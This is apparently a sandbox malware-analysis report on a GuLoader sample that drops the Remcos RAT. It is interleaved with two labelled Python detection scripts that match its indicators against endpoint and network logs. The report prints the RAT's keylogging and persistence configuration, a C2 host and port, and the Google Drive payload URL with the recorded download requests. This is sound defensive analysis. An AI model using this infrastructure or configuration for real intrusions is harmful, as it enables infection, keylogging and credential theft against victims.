Windows Analysis Report
SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe

Overview

General Information

Sample Name: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe
Analysis ID: 632533
MD5: c1863e820a135d468e9787f1f78970e2
SHA1: e0846c1117045f4ee73a6493e2207d4f27056b9e
SHA256: feb8a71e0b6bb912ce22c67275eba157fb10f626e18faeb5119789c7e89ecabd

Detection

GuLoader, Remcos
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Antivirus detection for dropped file
Yara detected GuLoader
Installs a global keyboard hook
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Contains functionality to enumerate device drivers
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection

Source: 00000008.00000000.1148737503.0000000001660000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm"}
Source: 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "dwilsonson23.sytes.net:3013:1", "Assigned name": "D_wilson user2", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "ios.exe", "Startup value": "ahw", "Hide file": "Enable", "Mutex": "Remcos-V27VY7", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "", "Keylog folder": "", "Keylog file max size": "0"}
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Virustotal: Detection: 13%
Source: Yara match File source: 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.5717991777.0000000001847000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1323401970.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe PID: 996, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ios.exe PID: 8752, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\install.vbs Avira: detection malicious, Label: VBS/Runner.VPD
Source: 25.2.ios.exe.410c71.2.unpack Avira: Label: ADWARE/Patched.Ren.Gen7
Source: 26.0.ios.exe.410c71.2.unpack Avira: Label: ADWARE/Patched.Ren.Gen7
Source: 26.0.ios.exe.410c71.9.unpack Avira: Label: ADWARE/Patched.Ren.Gen7
Source: 0.2.SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe.410c71.1.unpack Avira: Label: ADWARE/Patched.Ren.Gen7
Source: 26.2.ios.exe.410c71.1.unpack Avira: Label: ADWARE/Patched.Ren.Gen7
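The Remcos configuration extracted above is directly actionable: the C2 host and port, the copy location and file name, the Run-key value name, the mutex and the keylog file name can each be matched against endpoint telemetry. The following is an added example, not Joe Sandbox output and not code from the report; it converts the relevant configuration fields into indicators and runs them over a small set of constructed EDR-style events (the event schema, the benign events and the mapping of "AppData" to %APPDATA%\Roaming are assumptions, the indicator values come from the configuration shown above).

```python
"""Derive host and network indicators from the Remcos configuration shown
above and match them against EDR-style telemetry.  Added example, not Joe
Sandbox output; the telemetry schema (type/image/path/... fields) and the
sample events are constructed for illustration."""
import json
from typing import Dict, List

# Subset of the extracted Remcos configuration (values verbatim from the report).
REMCOS_CONFIG: Dict[str, str] = json.loads(r'''{
  "Host:Port:Password": "dwilsonson23.sytes.net:3013:1",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Disable",
  "Install path": "AppData",
  "Copy file": "ios.exe",
  "Startup value": "ahw",
  "Mutex": "Remcos-V27VY7",
  "Keylog flag": "1",
  "Keylog file": "logs.dat"
}''')

# Config flag -> registry Run key it enables (lower-cased for comparison).
RUN_KEYS = {
    "Setup HKCU\\Run": r"hkcu\software\microsoft\windows\currentversion\run",
    "Setup HKLM\\Run": r"hklm\software\microsoft\windows\currentversion\run",
}


def derive_iocs(cfg: Dict[str, str]) -> Dict[str, object]:
    """Translate configuration fields into concrete, matchable indicators."""
    host, port, _password = cfg["Host:Port:Password"].split(":", 2)
    # Assumption: "AppData" as install path means %APPDATA% (Roaming), which is
    # consistent with the dropped file C:\Users\user\AppData\Roaming\ios.exe above.
    base = r"\appdata\roaming" if cfg["Install path"] == "AppData" else ""
    return {
        "c2_host": host.lower(),
        "c2_port": int(port),
        "dropped_exe": base + "\\" + cfg["Copy file"].lower(),  # path suffix
        "run_keys": [k for flag, k in RUN_KEYS.items() if cfg.get(flag) == "Enable"],
        "run_value": cfg["Startup value"].lower(),
        "mutex": cfg["Mutex"],
        "keylog_file": cfg["Keylog file"].lower() if cfg.get("Keylog flag") == "1" else None,
    }


def match_events(events: List[Dict[str, object]], iocs: Dict[str, object]) -> List[str]:
    """Return one finding per telemetry event that matches an indicator."""
    hits: List[str] = []
    for ev in events:
        image = str(ev.get("image", "")).lower()
        kind = ev["type"]
        if kind == "net_connect":
            if str(ev["dst_host"]).lower() == iocs["c2_host"]:
                hits.append(f"C2 host {ev['dst_host']}:{ev['dst_port']} from {image}")
            elif ev["dst_port"] == iocs["c2_port"] and image.endswith(iocs["dropped_exe"]):
                # A bare port is weak evidence; require the dropped binary as source.
                hits.append(f"C2 port {ev['dst_port']} from dropped binary {image}")
        elif kind == "reg_set":
            key, name = str(ev["key"]).lower(), str(ev["value_name"]).lower()
            data = str(ev["data"]).lower()
            if key in iocs["run_keys"] and (name == iocs["run_value"] or data.endswith(iocs["dropped_exe"])):
                hits.append(f"Run-key persistence {ev['key']}\\{ev['value_name']} -> {ev['data']}")
        elif kind == "file_create":
            path = str(ev["path"]).lower()
            if path.endswith(iocs["dropped_exe"]):
                hits.append(f"Dropped Remcos binary {ev['path']}")
            elif iocs["keylog_file"] and path.rsplit("\\", 1)[-1] == iocs["keylog_file"] \
                    and image.endswith(iocs["dropped_exe"]):
                hits.append(f"Keylog file {ev['path']} written by {image}")
        elif kind == "mutex_create" and ev["name"] == iocs["mutex"]:
            hits.append(f"Remcos mutex {ev['name']} created by {image}")
    return hits


# Constructed telemetry mirroring the behaviour recorded in this report, plus
# two benign events (a browser HTTPS connection and an unrelated Run value).
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"type": "file_create", "image": r"C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe",
     "path": r"C:\Users\user\AppData\Roaming\ios.exe"},
    {"type": "reg_set", "image": r"C:\Users\user\AppData\Roaming\ios.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "value_name": "ahw",
     "data": r"C:\Users\user\AppData\Roaming\ios.exe"},
    {"type": "mutex_create", "image": r"C:\Users\user\AppData\Roaming\ios.exe", "name": "Remcos-V27VY7"},
    {"type": "net_connect", "image": r"C:\Users\user\AppData\Roaming\ios.exe",
     "dst_host": "dwilsonson23.sytes.net", "dst_ip": "185.20.186.103", "dst_port": 3013},
    {"type": "file_create", "image": r"C:\Users\user\AppData\Roaming\ios.exe",
     "path": r"C:\Users\user\AppData\Roaming\logs.dat"},
    {"type": "net_connect", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dst_host": "www.example.com", "dst_port": 443},
    {"type": "reg_set", "image": r"C:\Windows\System32\msiexec.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "value_name": "OneDrive",
     "data": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]


def scan() -> List[str]:
    """Run the derived indicators over the constructed telemetry."""
    return match_events(SAMPLE_EVENTS, derive_iocs(REMCOS_CONFIG))


if __name__ == "__main__":
    for finding in scan():
        print(finding)
```

The port-only rule is deliberately tied to the dropped binary as the connecting image: 3013/tcp on its own would fire on unrelated traffic, whereas the host name, the mutex, the Run value name and the %APPDATA%\ios.exe path are specific to this configuration. Note that the "HKLM\Run" flag is disabled in this sample, so only the HKCU key is derived; a config with both enabled yields both keys.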
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.186.142:443 -> 192.168.11.20:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.142:443 -> 192.168.11.20:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49771 version: TLS 1.2
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: DIFXAPI.pdb source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr
Source: Binary string: D:\corp\project\swnr\portaudio\build\msvc\x64\Release\portaudio_x64.pdb++ source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr
Source: Binary string: D:\corp\project\swnr\portaudio\build\msvc\x64\Release\portaudio_x64.pdb source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr
Source: Binary string: mshtml.pdb source: ios.exe, 0000001F.00000001.1820605446.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: DIFXAPI.pdbH source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr
Source: Binary string: mshtml.pdbUGP source: ios.exe, 0000001F.00000001.1820605446.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: d:\build\ob\bora-18379147\bora-vmsoft\build\release-x64\svga\wddm\src\devapi\Win8Release\x64\bin\vm3ddevapi64-release.pdb source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 25_2_00405D74
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_0040290B FindFirstFileW, 25_2_0040290B
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_0040699E FindFirstFileW,FindClose, 25_2_0040699E
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 26_2_00405D74
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_0040290B FindFirstFileW, 26_2_0040290B
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_0040699E FindFirstFileW,FindClose, 26_2_0040699E

Networking

Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm
Source: Malware configuration extractor URLs: dwilsonson23.sytes.net
Source: Joe Sandbox View ASN Name: DELTAHOST-ASUA DELTAHOST-ASUA
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected:
  GET /uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: drive.google.com
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/kdqkjtpbbdq1ma5od724n4arlrasmcfv/1653325275000/16125903511617426447/*/16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm?e=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Cache-Control: no-cache
  Host: doc-0o-68-docs.googleusercontent.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: drive.google.com
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cf8qgqli4rihm7727e1v30p2jqpcricp/1653325350000/16125903511617426447/*/16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm?e=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Cache-Control: no-cache
  Host: doc-0o-68-docs.googleusercontent.com
  Connection: Keep-Alive
Source: global traffic TCP traffic: 192.168.11.20:49772 -> 185.20.186.103:3013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
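The traffic above has a shape that can be hunted for independently of the specific Drive file ID or C2 address: a Google Drive direct-download URL (/uc?export=download) fetched with an Internet Explorer 11 "Trident/7.0" user agent, followed within seconds by a TCP connection from the same client to a non-standard port on a public address (here 185.20.186.103:3013). The following is an added example, not part of the report; it correlates constructed, tab-separated Zeek-style http.log and conn.log rows (the log layout, timestamps and benign rows are assumptions; URIs and user agent are visible because the capture, like the sandbox, sees decrypted traffic).

```python
"""Correlate the GuLoader stager download recorded above (IE11 'Trident/7.0'
user agent fetching a Google Drive 'uc?export=download' URL) with a follow-on
TCP connection from the same client to a non-standard port on a public
address, which in this report is 185.20.186.103:3013.  Added example, not part
of the report; the tab-separated Zeek-like log layout, the timestamps and the
benign rows are constructed."""
import ipaddress
from datetime import datetime, timedelta
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlparse

HTTP_FIELDS = ("ts", "src", "dst", "dport", "method", "host", "uri", "user_agent")
CONN_FIELDS = ("ts", "src", "dst", "dport", "proto")
COMMON_PORTS = {80, 443, 8080, 8443}
IE11_UA_MARKER = "Trident/7.0"

# Constructed http.log: the first two rows mirror the requests above (the
# googleusercontent path is shortened); the third is a Chrome download of
# another Drive file, which must not fire.
HTTP_LOG = "\n".join([
    "2022-05-23T17:01:15Z\t192.168.11.20\t142.250.186.142\t443\tGET\tdrive.google.com"
    "\t/uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm"
    "\tMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "2022-05-23T17:01:16Z\t192.168.11.20\t142.250.185.129\t443\tGET\tdoc-0o-68-docs.googleusercontent.com"
    "\t/docs/securesc/x/y/16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm?e=download"
    "\tMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "2022-05-23T17:02:40Z\t192.168.11.35\t142.250.186.142\t443\tGET\tdrive.google.com"
    "\t/uc?export=download&id=1abcDEF"
    "\tMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36",
])

# Constructed conn.log: the C2 connection from the report, a DNS datagram, a
# benign HTTPS flow from the other client, and a late internal RDP session.
CONN_LOG = "\n".join([
    "2022-05-23T17:01:20Z\t192.168.11.20\t185.20.186.103\t3013\ttcp",
    "2022-05-23T17:01:21Z\t192.168.11.20\t1.1.1.1\t53\tudp",
    "2022-05-23T17:02:45Z\t192.168.11.35\t142.250.185.129\t443\ttcp",
    "2022-05-23T17:40:00Z\t192.168.11.20\t10.0.0.5\t3389\ttcp",
])


def parse_log(text: str, fields: Tuple[str, ...]) -> List[Dict[str, str]]:
    """Split tab-separated rows into dicts, rejecting malformed rows loudly."""
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split("\t")
        if len(parts) != len(fields):
            raise ValueError(f"expected {len(fields)} fields, got {len(parts)}: {line!r}")
        rows.append(dict(zip(fields, parts)))
    return rows


def parse_ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def is_stager_download(row: Dict[str, str]) -> bool:
    """Drive direct-download URL fetched with the IE11 engine UA seen in the report."""
    url = urlparse(row["uri"])
    query = parse_qs(url.query)
    return (row["host"].lower() == "drive.google.com"
            and url.path == "/uc"
            and query.get("export") == ["download"]
            and IE11_UA_MARKER in row["user_agent"])


def correlate(http_rows: List[Dict[str, str]], conn_rows: List[Dict[str, str]],
              window: timedelta = timedelta(minutes=5)) -> List[Dict[str, object]]:
    """Pair each stager download with TCP flows from the same client to a
    non-standard port on a public address inside `window`; such a flow is the
    candidate second-stage C2 (Remcos on 3013/tcp in this report)."""
    alerts: List[Dict[str, object]] = []
    for dl in filter(is_stager_download, http_rows):
        t0 = parse_ts(dl["ts"])
        drive_id = parse_qs(urlparse(dl["uri"]).query).get("id", [""])[0]
        for c in conn_rows:
            if c["src"] != dl["src"] or c["proto"] != "tcp":
                continue
            if int(c["dport"]) in COMMON_PORTS or ipaddress.ip_address(c["dst"]).is_private:
                continue
            delay = parse_ts(c["ts"]) - t0
            if timedelta(0) <= delay <= window:
                alerts.append({"src": dl["src"], "download_id": drive_id,
                               "c2": f"{c['dst']}:{c['dport']}",
                               "delay_s": int(delay.total_seconds())})
    return alerts


def run_detection() -> List[Dict[str, object]]:
    return correlate(parse_log(HTTP_LOG, HTTP_FIELDS), parse_log(CONN_LOG, CONN_FIELDS))


if __name__ == "__main__":
    for alert in run_detection():
        print(alert)
```

The user agent is the discriminating feature: a Drive direct download on its own is routine, but an IE11 engine UA issuing it on a current Windows 10 workstation, with Cache-Control: no-cache and no Referer, is the WinHTTP/URLMon-style fetch a stager makes rather than a browser download. The time window and the public-address filter keep the second half of the rule from pairing the download with every internal connection the host makes afterwards; tune the window to the sleep/evasion delays such loaders use.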
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, DiFxAPI.dll.0.dr, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1312804686.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1306554035.00000000019B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1307073351.00000000019B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323401970.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
